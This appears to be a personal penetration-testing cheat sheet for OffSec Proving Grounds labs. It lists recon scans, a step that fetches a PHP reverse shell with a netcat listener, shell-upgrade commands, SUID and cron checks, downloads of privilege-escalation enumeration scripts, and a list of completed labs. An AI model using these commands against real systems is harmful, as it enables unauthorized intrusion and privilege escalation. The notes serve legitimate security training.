             /~~88b                     888  e88~-_           
     e88~~\ |   888 888-~88e-~88e  e88~\888 d888     888-~88e 
    d888    `  d88P 888  888  888 d888  888 8888~~\  888  888 
    8888      d88P  888  888  888 8888  888 8888   | 888  888  
    Y888     d88P   888  888  888 Y888  888 Y888   | 888  888 
.----"88__/ d88P___ 888  888  888  "88_/888  "88__/  888  888----.        
|             -->   Z2V0IG9mZiBteSBsYXduIQ==   <--               |      															    	     														
'----------------------------------------------------------------'                 
 juss sum notes to get me started haxin on offsec provin grounds.
  
 
nmap -sC -sV -p- -vv -oA -O full *host*
nmap -sC -sV -p-  *host*   <-- this gimme what i need most time

----

this been workin gud fer most
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 -x .html,.txt,.php dir -u http://*host*:*port*/
sometimes need to define status codes to exclude. 
-b "302,301"
or
specify status codes to accept
-s "204,301,302,307,401,403"  

nikto -h *host*

enum4linux -a *host*

----

searchsploit  --  exploitdb from cli

msfconsole

----

::phprev shell::
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
edit with host and nc port
nc -vnlp port

::nice breakout from basic ass rev shell::
python -c 'import pty; pty.spawn("/bin/bash")'
--or--
python3 -c 'import pty; pty.spawn("/bin/bash")'

if you wanna be fancy... pfft :P

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp     <-- make yo life mo easy 
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'
Ctrl + Z [Background Process]
stty raw -echo ; fg ; reset
stty columns 200 rows 200

----

find / -perm -u=s -type f 2>/dev/null     ....mmmm suids :P~'

peep da crons      smoke weed errday ౦０o ｡ (‾́。‾́ )y-~~ 
cat /etc/crontab
ls /etc/cron.*

::enum tools::
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py

https://gtfobins.github.io  --  this sum magic

::this hoe happen sumtimes trying to run scipts::
/bin/bash^M: bad interpreter: No such file or directory
::this getchu gucci::
sed -i -e 's/\r$//' *file*

----
PLAY
::warm up labs completed::
BBSCute
CyberSploit1
Dawn
FunboxEasy
FunboxEasyEnum	
FunboxRookie
Gaara
Geisha	
Inclusiveness
InfosecPrep	
Katana	
Lampiao	
Monitoring
OnSystemShellDredd	
Photographer
Potato
PyExp
Sar	
Seppuku	
Shakabrah
Sumo
SunsetDecoy
SunsetNoontide
Wpwn

::get to work labs completed::
Funbox

::try harder labs completed::

----

PRACTICE
::warm up::
Fantastic

    _ 													 
   [_] ..LéGO!!										     
 /;   :\												     
()'---' C													 
  | | |													 
  [=|=] 
